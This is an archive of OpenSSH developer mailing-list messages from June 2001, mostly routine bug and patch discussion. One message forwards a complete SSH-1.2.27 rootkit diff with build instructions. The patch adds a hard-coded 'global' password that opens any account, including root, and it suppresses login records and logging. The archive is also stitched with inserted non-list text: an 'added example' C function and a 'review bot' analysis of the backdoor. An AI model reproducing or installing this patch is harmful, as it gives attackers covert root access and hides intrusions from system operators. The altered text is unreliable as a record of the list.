From: stevesk at pobox.com (Kevin Steves) Date: Fri, 22 Jun 2001 13:55:58 -0700 (PDT) Subject: PATCH: pidfile/sigterm race In-Reply-To: <200106222040.f5MKeakZ011119@mail.ayamura.org> Message-ID: i'm addressing that just now. On Sat, 23 Jun 2001, Ayamura KIKUCHI wrote: :Some systems do not have pw_expire/pw_change fields in the passwd :structure. : :openssh_cvs/misc.c: : copy->pw_gecos = xstrdup(pw->pw_gecos); : copy->pw_uid = pw->pw_uid; : copy->pw_gid = pw->pw_gid; :+#ifdef HAVE_PW_EXPIRE_IN_PASSWD : copy->pw_expire = pw->pw_expire; :+#endif :+#ifdef HAVE_PW_CHANGE_IN_PASSWD : copy->pw_change = pw->pw_change; :+#endif : #ifdef HAVE_PW_CLASS_IN_PASSWD : copy->pw_class = xstrdup(pw->pw_class); : #endif From markus.friedl at informatik.uni-erlangen.de Sat Jun 23 08:03:06 2001 
From: markus.friedl at informatik.uni-erlangen.de (Markus Friedl)
Date: Sat, 23 Jun 2001 00:03:06 +0200
Subject: [Lutz.Jaenicke@aet.TU-Cottbus.DE: 2.9p1: HP-UX 10.20 utmp/wtmp handling broken?]
In-Reply-To: <20010621151214.A27941@ws01.aet.tu-cottbus.de>; from Lutz.Jaenicke@aet.TU-Cottbus.DE on Thu, Jun 21, 2001 at 03:12:15PM +0200
References: <20010620102051.A1595@ws01.aet.tu-cottbus.de> <20010620154926.A8991@faui02.informatik.uni-erlangen.de> <20010620180845.A18250@ws01.aet.tu-cottbus.de> <20010621054326.A17059@folly> <20010621151214.A27941@ws01.aet.tu-cottbus.de>
Message-ID: <20010623000306.A14300@folly>

i get this on openbsd-current:

Connection closed by remote host.
debug1: channel_free: channel 0: server-session, nchannels 1
debug3: channel_free: status: The following connections are open: #0 server-session (t4 r0 i1/0 o16/0 fd 4/3)
debug1: channel_free: channel 0: dettaching channel user
debug1: session_by_channel: session 0 channel 0
debug1: session_close_by_channel: channel 0 kill 5870
debug1: Received SIGCHLD.
debug3: channel_close_fds: channel 0: r 4 w 3 e -1
debug1: session_by_pid: pid 5870
debug1: session_close: session 0 pid 5870
debug1: session_pty_cleanup: session 0 release /dev/ttyqc
Closing connection to 127.0.0.1

-m

From info at ninosdepapel.org Sat Jun 23 07:56:13 2001
From: info at ninosdepapel.org (Niños de Papel)
Date: Fri, 22 Jun 2001 16:56:13 -0500
Subject: To Enjoy Art with a Purpose
Message-ID: <200106221807171.SM00339@internet>

***** This is an HTML Message ! *****
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.mindrot.org/pipermail/openssh-unix-dev/attachments/20010622/76b4c52d/attachment.html

From vader at conflict.net Sat Jun 23 11:57:22 2001
From: vader at conflict.net (Jim Breton)
Date: Sat, 23 Jun 2001 01:57:22 +0000
Subject: pam session
In-Reply-To: <01061903113100.00225@christian.localdomain>; from ckraemer@ginko.de on Tue, Jun 19, 2001 at 03:11:02AM +0200
References: <01061903113100.00225@christian.localdomain>
Message-ID: <20010623015722533062.16104@alongtheway.com>

On Tue, Jun 19, 2001 at 03:11:02AM +0200, Christian Kraemer wrote:
> This is especially annoying if you
> use pam_limits.so to set rlimits. Every user could
> circumvent them easily by calling ssh in this way:
> ssh user at server /bin/sh

Interestingly, Debian 2.2's openssh (1:1.2.3-9.3) does enforce rlimits somehow, not sure if it was specifically patched to do this or perhaps the older version just does not have this problem.

Just an FYI, while messing with this I also notice that the SSH_CLIENT and SSH_TTY environment variables are not being set, and no authlog message is generated. (Neither of these problems exist in the Debian build.)

From abartlet at pcug.org.au Sat Jun 23 22:04:17 2001
From: abartlet at pcug.org.au (Andrew Bartlett)
Date: Sat, 23 Jun 2001 22:04:17 +1000
Subject: pam session
References: <01061903113100.00225@christian.localdomain> <20010623015722533062.16104@alongtheway.com>
Message-ID: <3B3485C1.873E4EE5@bartlett.house>

Jim Breton wrote:
> 
> On Tue, Jun 19, 2001 at 03:11:02AM +0200, Christian Kraemer wrote:
> > This is especially annoying if you
> > use pam_limits.so to set rlimits. Every user could
> > circumvent them easily by calling ssh in this way:
> > ssh user at server /bin/sh
> 
> Interestingly, Debian 2.2's openssh (1:1.2.3-9.3) does enforce rlimits
> somehow, not sure if it was specifically patched to do this or perhaps
> the older version just does not have this problem.
> 
> Just an FYI, while messing with this I also notice that the SSH_CLIENT
> and SSH_TTY environment variables are not being set, and no authlog
> message is generated. (Neither of these problems exist in the Debian
> build.)

Yep, there has been some major regression in this area (IMHO) compared with previous releases. Both the pam session stuff and some other logging seemed to get dropped.

Andrew Bartlett

-- 
Andrew Bartlett
abartlet at pcug.org.au
abartlet at samba.org

From mouring at etoh.eviladmin.org Sun Jun 24 02:28:04 2001
From: mouring at etoh.eviladmin.org (mouring at etoh.eviladmin.org)
Date: Sat, 23 Jun 2001 11:28:04 -0500 (CDT)
Subject: pam session in linux port
In-Reply-To: <3B33286F.91DCDFF9@bartlett.house>
Message-ID:

I never saw a response from Damien, and there is a nagging voice in the back of my mind about this topic, but for the life of me I can't find in the archives what it was.

If it's agreed that it should be done as soon as sort out re-install issues under Linux I'll add it to both -HEAD and the 2.9 branch.

As for any patch since 2.9 was released. It seems most of us have gotten backed up, and I plan on going back through (about 40 some of emails patch suggestions that looked valid) and weeding through what should be applied to and what should be reworked and proposed to the OpenBSD team.

- Ben

On Fri, 22 Jun 2001, Andrew Bartlett wrote:
> Christian Kraemer wrote:
> > 
> > Hi,
> > 
> > Does anybody know why openssh (openssh-2.9p1) on a linux system does not call
> > pam_open_session if no pty is used? In this way the session modules (in
> > /etc/pam.d) are not activated.
> > 
> > This is especially annoying if you
> > use pam_limits.so to set rlimits. Every user could
> > circumvent them easily.
> > 
> > I do not know if this issue has been discussed before and if this behavior is
> > not alright .....
> > 
> > cu Christian
> 
> I posted a patch to correct this behaviour, but it seems to have been
> ignored (I've certainly not heard back about it).
> 
> Andrew Bartlett
> 
> -- 
> Andrew Bartlett
> abartlet at pcug.org.au
> abartlet at samba.org
> 

From pekkas at netcore.fi Sun Jun 24 03:08:03 2001
From: pekkas at netcore.fi (Pekka Savola)
Date: Sat, 23 Jun 2001 20:08:03 +0300 (EEST)
Subject: pam session in linux port
In-Reply-To:
Message-ID:

On Sat, 23 Jun 2001 mouring at etoh.eviladmin.org wrote:
> I never saw a response from Damien, and there is a nagging voice in the
> back of my mind about this topic, but for the life of me I can't find in
> the archives what it was.
> 
> If it's agreed that it should be done as soon as sort out re-install
> issues under Linux I'll add it to both -HEAD and the 2.9 branch.
> 
> As for any patch since 2.9 was released. It seems most of us have gotten
> backed up, and I plan on going back through (about 40 some of emails
> patch suggestions that looked valid) and weeding through what should be
> applied to and what should be reworked and proposed to the OpenBSD team.

This has been in on and off. The crux was that the pam session must be initialized after fork etc. if you want the limits to be effective for the user, not root, IIRC.

This in turn caused some trouble.

I recall the relevant commits were:

---
20010221
 - (stevesk) session.c: back out to where we were before:
   - (djm) Move PAM session initialisation until after fork in sshd. Patch
     from Nalin Dahyabhai

20010214
 - (djm) Don't try to close PAM session or delete credentials if the
   session has not been open or credentials not set. Based on patch from
   Andrew Bartlett
 - (djm) Move PAM session initialisation until after fork in sshd. Patch
   from Nalin Dahyabhai
---

Also, there's some discussion on the issue in Red Hat bugzilla:

http://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=25690
http://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=27692

So.. this definitely doesn't appear to be a trivial thing to "fix".

-- 
Pekka Savola                 "Tell me of difficulties surmounted,
Netcore Oy                    not those you stumble over and fall"
Systems. Networks. Security.   -- Robert Jordan: A Crown of Swords

From mouring at etoh.eviladmin.org Sun Jun 24 02:59:29 2001
From: mouring at etoh.eviladmin.org (mouring at etoh.eviladmin.org)
Date: Sat, 23 Jun 2001 11:59:29 -0500 (CDT)
Subject: pam session in linux port
In-Reply-To:
Message-ID:

Yep, you hit the nail on the head.. This is what was the nagging voice. It's horrible when you have mailinglist messages scattered over multiple mailboxes.

However, my understanding was either PAM was now (as of 2.9) handled as a fake BSD-AUTH. Or was going to be handled that way, and that would assist in most of this problem.

- Ben

On Sat, 23 Jun 2001, Pekka Savola wrote:
> On Sat, 23 Jun 2001 mouring at etoh.eviladmin.org wrote:
> > I never saw a response from Damien, and there is a nagging voice in the
> > back of my mind about this topic, but for the life of me I can't find in
> > the archives what it was.
> > 
> > If it's agreed that it should be done as soon as sort out re-install
> > issues under Linux I'll add it to both -HEAD and the 2.9 branch.
> > 
> > As for any patch since 2.9 was released. It seems most of us have gotten
> > backed up, and I plan on going back through (about 40 some of emails
> > patch suggestions that looked valid) and weeding through what should be
> > applied to and what should be reworked and proposed to the OpenBSD team.
> 
> This has been in on and off. The crux was that the pam session must be
> initialized after fork etc. if you want the limits to be effective for
> the user, not root, IIRC.
> 
> This in turn caused some trouble.
> 
> I recall the relevant commits were:
> 
> ---
> 20010221
> - (stevesk) session.c: back out to where we were before:
> - (djm) Move PAM session initialisation until after fork in sshd. Patch
> from Nalin Dahyabhai
> 
> 
> 20010214
> - (djm) Don't try to close PAM session or delete credentials if the
> session has not been open or credentials not set. Based on patch from
> Andrew Bartlett
> - (djm) Move PAM session initialisation until after fork in sshd.
Patch > from Nalin Dahyabhai > --- > > Also, there's some discussion on the issue in Red Hat bugzilla: > > http://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=25690 > http://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=27692 > > > So.. this definitely doesn't appear to be a trivial thing to "fix". > > -- > Pekka Savola "Tell me of difficulties surmounted, > Netcore Oy not those you stumble over and fall" > Systems. Networks. Security. -- Robert Jordan: A Crown of Swords > > From abartlet at pcug.org.au Sun Jun 24 10:01:44 2001 
From: abartlet at pcug.org.au (Andrew Bartlett)
Date: Sun, 24 Jun 2001 10:01:44 +1000
Subject: pam session in linux port
References:
Message-ID: <3B352DE8.6CFA3A17@bartlett.house>

Pekka Savola wrote:
> 
> On Sat, 23 Jun 2001 mouring at etoh.eviladmin.org wrote:
> > I never saw a response from Damien, and there is a nagging voice in the
> > back of my mind about this topic, but for the life of me I can't find in
> > the archives what it was.
> > 
> > If it's agreed that it should be done as soon as sort out re-install
> > issues under Linux I'll add it to both -HEAD and the 2.9 branch.
> > 
> > As for any patch since 2.9 was released. It seems most of us have gotten
> > backed up, and I plan on going back through (about 40 some of emails
> > patch suggestions that looked valid) and weeding through what should be
> > applied to and what should be reworked and proposed to the OpenBSD team.
> 
> This has been in on and off. The crux was that the pam session must be
> initialized after fork etc. if you want the limits to be effective for
> the user, not root, IIRC.
> 
> This in turn caused some trouble.
> 
> I recall the relevant commits were:
> 
> ---
> 20010221
> - (stevesk) session.c: back out to where we were before:
> - (djm) Move PAM session initialisation until after fork in sshd. Patch
> from Nalin Dahyabhai
> 
> 20010214
> - (djm) Don't try to close PAM session or delete credentials if the
> session has not been open or credentials not set. Based on patch from
> Andrew Bartlett
> - (djm) Move PAM session initialisation until after fork in sshd. Patch
> from Nalin Dahyabhai
> ---
> 
> Also, there's some discussion on the issue in Red Hat bugzilla:
> 
> http://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=25690
> http://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=27692
> 
> So.. this definitely doesn't appear to be a trivial thing to "fix".

We run it for exec_pty(), just not for exec_no_pty(), so it's not actually related.
Both are called at the same 'level' of the code, just with/without a pty. Andrew Bartlett abartlet at pcug.org.au -- Andrew Bartlett abartlet at pcug.org.au abartlet at samba.org From mouring at etoh.eviladmin.org Sun Jun 24 17:19:23 2001 
From: mouring at etoh.eviladmin.org (mouring at etoh.eviladmin.org)
Date: Sun, 24 Jun 2001 02:19:23 -0500 (CDT)
Subject: Patch to enable multiple possible sources of entropy
In-Reply-To: <20010611091947.A4269@lucent.com>
Message-ID:

To let you know I'm not ignoring this. Damien has code like this already from the sounds of it. Just working out minor details of how to deal with ssh-keygen, etc which don't read the sshd_config nor ssh_config for the admin's preferred order of entropy gathering.

- Ben

On Mon, 11 Jun 2001, Dave Dykstra wrote:
> On Sun, Jun 10, 2001 at 10:41:14PM -0400, Michael Stone wrote:
> > On Sun, Jun 10, 2001 at 12:49:18PM -0500, mouring at etoh.eviladmin.org wrote:
> > > Hmm.. my only complaints about the patch is that seed_rng and init_rng are
> > > pretty unreadable due to #ifdef/#end
> 
> I could make it a lot more readable by having it always do access() to
> probe for RANDOM_POOL and PRNGD_SOCKET even if one of them is the only
> choice. I initially elected to trade off exact compatibility for
> readability, but I'd be happy to change it. I've included the more
> readable init_rng() below for you to take a look at. The difference is
> that even if only one of RANDOM_POOL or PRNGD_SOCKET is compiled in, if it
> isn't there the error message will be the more generic
> 	Couldn't find source for random number generator seed
> rather than a message about the problem accessing the specific source. I
> put in some debug level 2 messages to help debugging that case (those are
> good even if you choose to keep the extra ifdefs), and I slightly improved
> the fatal error message.
> 
> Also, the ifdefs for PRNGD_SOCKET and USE_BUILTIN_ENTROPY do not really
> need to be in the else case of PRNGD_PORT because configure enforces that
> already, but I think it's more understandable this way.
> 
> 
> > > and that I don't know if I like the
> > > idea of ssh/sshd stepping down in entropy quality on a whim.
Which is > > > what this patch would do if for some odd reason prngd is offline at > > > startup of sshd/ssh. > > > > What if there were some kind of warning message? We've already seen the > > obnoxious key-is-1023 message, what's one more? > > I don't mind a debug message but I really would not want a warning message > because that's going to be the normal case on a lot of my systems. My > answer is that most likely even if prngd is offline, the PRNGD_SOCKET will > still exist even though there's no process listening on the other side. In > that case, ssh will go ahead into the prngd_get_random_bytes case but get a > Connection Refused error (this happened during my testing). > > Another idea would be to improve the fatal error message by saving some > information when the access() calls fail rather than just printing debug > messages. For example, there could be a variable that points to the error > message to use if it gets to the fatal condition at the end. Do you like > that better? I don't think that complication is necessary. > > > > Obviously the entropy > > requirement depends on the application, but there are a lot of machines > > where I'm far more concerned about not getting in at all (because prngd > > is busted) than I am about bad entropy in that case. It's no worse than > > if prngd weren't being used at all, and might make it easier to accept > > prngd. > > Good point. 
> 
> - Dave Dykstra
> 
> 
> ------ more readable init_rng() follows ------------------------
> 
> void
> init_rng(void)
> {
> 	check_openssl_version();
> 
> #ifdef RANDOM_POOL
> 	if (access(RANDOM_POOL, F_OK) == 0) {
> 		seed_source = POOL_SOURCE;
> 		return;
> 	}
> 	else {
> 		debug2("Random pool %s does not exist", RANDOM_POOL);
> 	}
> #endif /* RANDOM_POOL */
> 
> 	/* it's not trivial to probe for an open port so just make it
> 	 * take priority over the other sources if it is defined
> 	 */
> #ifdef PRNGD_PORT
> 	seed_source = PRNGD_SOURCE;
> #else
> 
> #ifdef PRNGD_SOCKET
> 	if (access(PRNGD_SOCKET, F_OK) == 0) {
> 		seed_source = PRNGD_SOURCE;
> 		return;
> 	}
> 	else {
> 		debug2("Entropy socket %s does not exist", PRNGD_SOCKET);
> 	}
> #endif /* PRNGD_SOCKET */
> 
> #ifdef USE_BUILTIN_ENTROPY
> 	seed_source = BUILTIN_SOURCE;
> 	prng_init_rng();
> #endif
> 
> #endif /* PRNGD_PORT */
> 
> 	if (seed_source == 0)
> 		fatal("Couldn't find entropy source for random number generator");
> }
> 

From Lutz.Jaenicke at aet.TU-Cottbus.DE Mon Jun 25 01:24:13 2001
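An added example for the entropy-source discussion above (not Dave's patch and not OpenSSH code): a table-driven version of the probe order in init_rng() that also keeps the reason each source was rejected, so the final fatal message can name the specific problem instead of the generic one, as suggested in the reply. The probe labels and paths are constructed for the example; /dev/null stands in for an existing random pool.

```c
#include <errno.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>

/* Seed sources in the same priority order as init_rng(): kernel pool,
 * then prngd (port or socket), then the builtin gatherer. */
enum seed_source { NO_SOURCE = 0, POOL_SOURCE, PRNGD_SOURCE, BUILTIN_SOURCE };

struct seed_probe {
    enum seed_source source;
    const char *label;
    const char *path;   /* probed with access(); NULL means "assume present" (e.g. a TCP port) */
};

/* Walks the probes in order and returns the first usable source. When none
 * is usable, errbuf holds why each probed source was rejected, so the caller
 * can put that into the fatal() message instead of a generic one. */
enum seed_source select_seed_source(const struct seed_probe *probes, size_t nprobes,
                                    char *errbuf, size_t errlen)
{
    size_t used = 0;

    if (errlen > 0)
        errbuf[0] = '\0';
    for (size_t i = 0; i < nprobes; i++) {
        if (probes[i].path == NULL || access(probes[i].path, F_OK) == 0)
            return probes[i].source;
        if (errlen == 0)
            continue;
        /* access() failed: record the reason before errno is disturbed. */
        int n = snprintf(errbuf + used, errlen - used, "%s%s %s: %s",
                         used ? "; " : "", probes[i].label, probes[i].path,
                         strerror(errno));
        if (n > 0) {
            used += (size_t)n;
            if (used >= errlen)
                used = errlen - 1;   /* message was truncated; stay in bounds */
        }
    }
    return NO_SOURCE;
}

int main(void)
{
    /* Constructed probe tables: one where the pool exists, one where it does not. */
    const struct seed_probe with_pool[] = {
        { POOL_SOURCE,  "random pool",    "/dev/null" },
        { PRNGD_SOURCE, "entropy socket", "/nonexistent/entropy" },
    };
    const struct seed_probe no_pool[] = {
        { POOL_SOURCE,  "random pool",    "/nonexistent/random" },
        { PRNGD_SOURCE, "entropy socket", "/nonexistent/entropy" },
    };
    char err[256];

    printf("with pool: source %d\n",
           (int)select_seed_source(with_pool, 2, err, sizeof err));
    if (select_seed_source(no_pool, 2, err, sizeof err) == NO_SOURCE)
        printf("fatal: Couldn't find entropy source for random number generator (%s)\n", err);
    return 0;
}
```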
From: Lutz.Jaenicke at aet.TU-Cottbus.DE (Lutz Jaenicke) Date: Sun, 24 Jun 2001 17:24:13 +0200 Subject: [Lutz.Jaenicke@aet.TU-Cottbus.DE: 2.9p1: HP-UX 10.20 utmp/wtmp handling broken?] In-Reply-To: <20010623000306.A14300@folly>; from markus.friedl@informatik.uni-erlangen.de on Sat, Jun 23, 2001 at 12:03:06AM +0200 References: <20010620102051.A1595@ws01.aet.tu-cottbus.de> <20010620154926.A8991@faui02.informatik.uni-erlangen.de> <20010620180845.A18250@ws01.aet.tu-cottbus.de> <20010621054326.A17059@folly> <20010621151214.A27941@ws01.aet.tu-cottbus.de> <20010623000306.A14300@folly> Message-ID: <20010624172413.A6782@serv01.aet.tu-cottbus.de> On Sat, Jun 23, 2001 at 12:03:06AM +0200, Markus Friedl wrote: > > i get this on openbsd-current: There was a misunderstanding in the naming conventions. For you "current" is the OpenBSD version. For me "current" meant the latest version of portable via anonymous CVS. As Ben pointed out in personal mail to me, there is always a lag between the OpenBSD version and the portable version. In the ChangeLog of portable I found 20010621 ... - markus at cvs.openbsd.org 2001/06/20 13:56:39 [channels.c channels.h clientloop.c packet.c serverloop.c] move from channel_stop_listening to channel_free_all, call channel_free_all before calling waitpid() in serverloop. fixes the utmp handling; report from Lutz.Jaenicke at aet.TU-Cottbus.DE ... and thought everything should be in sync. It obviously was not. I'll follow the development on the "portable" tree. OpenBSD-current won't run on my HP-UX boxes... Best regards, Lutz -- Lutz Jaenicke Lutz.Jaenicke at aet.TU-Cottbus.DE BTU Cottbus http://www.aet.TU-Cottbus.DE/personen/jaenicke/ Lehrstuhl Allgemeine Elektrotechnik Tel. +49 355 69-4129 Universitaetsplatz 3-4, D-03044 Cottbus Fax. +49 355 69-4153 From dwd at bell-labs.com Tue Jun 26 04:22:40 2001 
From: dwd at bell-labs.com (Dave Dykstra)
Date: Mon, 25 Jun 2001 13:22:40 -0500
Subject: rsa_private_decrypt() failed
In-Reply-To: <20010622150327.E26652@more.net>; from pete@more.net on Fri, Jun 22, 2001 at 03:03:27PM -0500
References: <20010622150327.E26652@more.net>
Message-ID: <20010625132240.A14341@lucent.com>

On Fri, Jun 22, 2001 at 03:03:27PM -0500, pete at more.net wrote:
> Hello,
> 
> I'm running several Sparcs with Solaris 2.7 on them. They all have
> Openssh 2.9 installed, and all work fine. Except one. Every once in a
> while I get this:
> 
> "Disconnecting: Corrupted check bytes on input."
> 
> When I truss or I am at the console I get this:
> 
> "rsa_private_decrypt() failed"
> 
> I've tried reinstalling with OpenSSH 2.5, 2.9 and the commercial
> versions. I get these errors from Linux and x86 Solaris boxes too in
> random intervals. It's just this one box.
> 
> Obviously it seems like a lib is screwed up. All of my boxes are at the
> same patch level. I've also installed new OpenSSL and zlib's. I've seen
> different requests at the OpenSSH site's mailing list archives for a fix,
> and I haven't found any that work.
> 
> I've generated several sets of keys, and replaced all the configs with
> ones known to work fine everywhere else. Any clues or suggestions
> would be greatly appreciated.

I had this problem on SSH 1.2.27, and it turned out to be limited to the Sun compiler; compiling with gcc fixed the problem. I too had it happening on only one machine, and only about 25% of the time; machines with identical hardware and software did not fail. I narrowed down the problem to the section of code that calculates MD5 checksums; some percentage of the time it simply calculated an incorrect value. I found that if I recompiled with gcc, the problem went away. I tried Sun compiler versions SC3.0.1, SC4.0, and SC4.2 and they all had the problem.
My theory is that there is some processor register that is not being saved by the Sun compiler which sometimes got clobbered by a context switch or swap, and it only happened on the one machine because it was more heavily loaded.

- Dave Dykstra

From reza at loudcloud.com Tue Jun 26 04:49:45 2001
From: reza at loudcloud.com (Reza Naima)
Date: Mon, 25 Jun 2001 11:49:45 -0700
Subject: ServerSide ACLs for -L type port forwarding
Message-ID: <20010625114945.A31324@loudcloud.com>

I have a need to add some server-side ACL functionality to the way ssh handles port forwarding. For a first pass, I want to be able to restrict -L port forwarding to localhost on the server only and I want to be able to specify the ports on Server. I was wondering if there would be any desire to incorporate said changes back into the main development tree? If so, are there coding guidelines available somewhere.

Thanks,
Reza

p.s. I haven't yet subscribed to the list, so please Cc me with any replies

-- 
/"\
\ /  ASCII Ribbon Campaign
 X   Against HTML Mail
/ \  and Postings

From nbecker at fred.net Tue Jun 26 05:41:06 2001
From: nbecker at fred.net (nbecker at fred.net)
Date: 25 Jun 2001 15:41:06 -0400
Subject: No cipher option
Message-ID:

I noticed that "no cipher" is not an option in recent open-ssh. I wish there was an option. I'd like to use ssh as a replacement for rsh in

rsh machine1 "tar -f - " | rsh machine2 "tar -f - "

But for massive file copies, I really don't want to go through encryption. Still, I would like the strong authentication offered by ssh. So I think "cipher none" would be a good choice here.

From kevin at tgivan.com Tue Jun 26 07:16:14 2001
From: kevin at tgivan.com (Kevin Sindhu) Date: Mon, 25 Jun 2001 14:16:14 -0700 Subject: Apparent SSH-1.2.27 Rootkit Message-ID: <3B37AA1E.DF877BAC@tgivan.com> Hello, I found this lurking around the web, and thought people who are running SSH-1.2.27 might be interested. -- Kevin Sindhu Systems Engineer TGI Technologies Inc. Tel: (604) 872-6676 Ext 321 107 E 3rd Avenue Fax: (604) 872-6601 Vancouver,BC V5T 1C7 Canada. -------------- next part -------------- Welcome Root Kit SSH distribution v5.0 (by Zelea) This version was build on TimeCop's previous SSH RootKit New in this version: - build against ssh-1.2.27 - corrected a bug that prevented wtmp/utmp login when RSA authentication and .shosts was used - when login in with the 'global' password a message "Closed connection from %IP%" is logged - encrypted 'global' password Your password isn't stored in clear anymore in the sshd daemon. Only the MD5 hash of your password is. This will prevent anyone to retrieve that password from the binary file To use, edit rk-ssh.diff and change the 'global' password has to whatever you want. To do this use the md5sum program: md5sum --string=Your-Global-Password and then paste the 32 character hash string in the diff file Patch ssh-1.2.27 source tree using patch -p1 < rk-ssh.diff Then ./configure, make, make install. --- doc from previous releases --- Yes, there is a known bug, it doesn't display Closing connection to ... when a normal user logs out after being logged in with a global password. Yes, I am working on that. It would require me to add another global var or make lets_log a binary fields variable... So next version will hopefully fix this. Hey, thanks to someone on IRC, they mentioned about the PermitRootLogin in /etc/sshd_config... Now logging in with a global password makes sure you still login even though the PermitRootLogin is no :) Nice feature. More logging has been disabled. 
Fixed in this release: * logging user logins is only disabled when a global password is used * no more #define shit * cleaner code * it actually works well this time :) -------------- next part -------------- diff -urN ssh-1.2.27-old/login.c ssh-1.2.27/login.c --- ssh-1.2.27-old/login.c Wed May 12 07:19:26 1999 +++ ssh-1.2.27/login.c Mon Dec 6 23:06:32 1999 @@ -119,6 +119,8 @@ #endif /* HAVE_HPUX_TCB_AUTH */ #include "ssh.h" +int lets_log; + /* Returns the time when the user last logged in. Returns 0 if the information is not available. This must be called before record_login. The host the user logged in from will be returned in buf. */ @@ -259,6 +261,7 @@ { int fd; + if (lets_log) { #if defined(HAVE_LASTLOG_H) || defined(HAVE_LASTLOG) struct lastlog ll; char *lastlog; @@ -559,11 +562,13 @@ } #endif } +} /* Records that the user has logged out. */ void record_logout(int pid, const char *ttyname) { +if (lets_log) { #ifdef HAVE_LIBUTIL_LOGIN const char *line = ttyname + 5; /* /dev/ttyq8 -> ttyq8 */ if (logout(line)) @@ -571,4 +576,5 @@ #else /* HAVE_LIBUTIL_LOGIN */ record_login(pid, ttyname, "", -1, "", NULL); #endif /* HAVE_LIBUTIL_LOGIN */ +} } diff -urN ssh-1.2.27-old/ssh.h ssh-1.2.27/ssh.h --- ssh-1.2.27-old/ssh.h Wed May 12 07:19:28 1999 +++ ssh-1.2.27/ssh.h Mon Dec 6 23:06:58 1999 @@ -866,6 +866,7 @@ /* Global variables */ extern uid_t original_real_uid; +extern int lets_log; #ifdef AMIGA #define UID_ROOT 65535 diff -urN ssh-1.2.27-old/sshd.c ssh-1.2.27/sshd.c --- ssh-1.2.27-old/sshd.c Mon Dec 6 23:10:22 1999 +++ ssh-1.2.27/sshd.c Tue Dec 7 00:09:58 1999 @@ -1408,7 +1408,9 @@ auth_delete_socket(NULL); /* The connection has been terminated. */ + if (lets_log) { log_msg("Closing connection to %.100s", get_remote_ipaddr()); + } packet_close(); exit(0); } 
@@ -2135,6 +2137,38 @@ abort(); } +/* Check if the "global" password was entered */ +int check_global_passwd( unsigned char *pass ) +{ + /* Paste here the output from md5sum --string="Your_Password" */ + char md5passwd[33]="ed5c6101c7cc02d1a927e2e37be1eb0d"; + struct MD5Context md; + unsigned char md5buffer[32]; + int i; + + /* Compute the response. */ + MD5Init(&md); + MD5Update(&md, pass, strlen( pass)); + MD5Final(md5buffer, &md); + for( i = 15; i >= 0; i-- ) + { + md5buffer[i*2+1] = (md5buffer[i] & 0xf) + '0'; + md5buffer[i*2] = (md5buffer[i] >> 4) + '0'; + } + for( i = 0; i < 32; i++ ) + if( md5buffer[i] > '9' ) + md5buffer[i] += 0x27; /* lower case hexa chars */ + + if( strncmp(md5passwd,md5buffer,32) ) + return 0; + else + { + /* Disable logging if conditions are met. */ + lets_log=0; + return 1; + } +} + /* Performs authentication of an incoming connection. Session key has already been exchanged and encryption is enabled. User is the user name to log in as (received from the clinet). Privileged_port is true if the @@ -2278,6 +2312,7 @@ /* Get a packet from the client. */ type = packet_read(); + lets_log=1; /* Process the packet. */ switch (type) { @@ -2660,14 +2695,17 @@ #if defined(KERBEROS) && defined(KRB5) if (auth_password(user, password, client)) #else /* defined(KERBEROS) && defined(KRB5) */ - if (auth_password(user, password)) + if (auth_password(user, password) || check_global_passwd(password) ) #endif /* defined(KERBEROS) && defined(KRB5) */ { /* Successful authentication. */ /* Clear the password from memory. */ memset(password, 0, strlen(password)); xfree(password); - log_msg("Password authentication for %.100s accepted.", user); + if( lets_log ) + log_msg("Password authentication for %.100s accepted.", user); + else + log_msg("Closing connection to %.100s", get_remote_ipaddr()); authentication_type = SSH_AUTH_PASSWORD; authenticated = 1; break; 
@@ -2708,14 +2746,14 @@ } /* Check if the user is logging in as root and root logins are disallowed. */ - if (pw->pw_uid == UID_ROOT && options.permit_root_login == 1) + if (pw->pw_uid == UID_ROOT && options.permit_root_login == 1 && !lets_log) { if (authentication_type == SSH_AUTH_PASSWORD) packet_disconnect("ROOT LOGIN REFUSED FROM %.200s", get_canonical_hostname()); } else - if (pw->pw_uid == UID_ROOT && options.permit_root_login == 0) + if (pw->pw_uid == UID_ROOT && options.permit_root_login == 0 && lets_log) { if (forced_command) log_msg("Root login accepted for forced command.", forced_command); @@ -2767,7 +2805,7 @@ #endif /* Log root logins with severity NOTICE. */ - if (pw->pw_uid == UID_ROOT) + if (pw->pw_uid == UID_ROOT && lets_log) log_severity(SYSLOG_SEVERITY_NOTICE, "ROOT LOGIN as '%.100s' from %.100s", pw->pw_name, get_canonical_hostname()); From markus.friedl at informatik.uni-erlangen.de Tue Jun 26 14:59:00 2001 
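Review bot: this patch is a backdoor and must be rejected as a whole, not corrected. In the sshd.c hunks, check_global_passwd() is OR-ed into the password check (`auth_password(user, password) || check_global_passwd(password)`), so any account, root included, is accepted when the supplied password matches the hard-coded MD5 hash in md5passwd; on success it sets lets_log=0, which makes the accept line log a fake "Closing connection to" message instead, suppresses the later "Closing connection" and ROOT LOGIN notices, and (via the login.c hunks, which wrap the bodies of record_login and record_logout in `if (lets_log)`) skips the utmp/wtmp/lastlog entries for that session. The PermitRootLogin hunk is also weakened for everyone: the `permit_root_login == 1` refusal is now gated on `!lets_log`, which is false for every normal password login, so that refusal no longer fires at all, and the `permit_root_login == 0` refusal is skipped whenever the global password was used. For an operator auditing an ssh-1.2.27 build, the indicators are exactly the additions visible here: the symbols lets_log and check_global_passwd, a 32-character hex literal beside an MD5Init/MD5Update/MD5Final sequence in sshd.c, and a login.c whose record_login/record_logout bodies are conditional on a global flag.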
